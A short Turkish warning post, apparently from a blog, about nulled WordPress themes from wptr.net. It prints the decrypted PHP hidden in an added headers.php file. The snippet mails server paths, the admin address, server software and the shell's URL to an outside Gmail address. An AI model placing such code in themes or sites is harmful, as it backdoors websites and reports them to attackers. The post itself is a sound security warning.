header.php harici, headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş. Resimde de dosya ve klasörler oluşturmaya başlayıp, dosya izinleriyle, yetkilerle oynuyorlar.
casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.
Şifresiz hali budur
z��r�^$kime="indirelimhemen@gmail.com";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);Bu siteden, yani wptr.net isimli siteden indirdiğiniz her tema bunun gibidir. Dikkatli olun ve benim temam dahil tüm temaları resmi sitelerinden indirmeye dikkat edin.
Kaynak: sturkmen.com
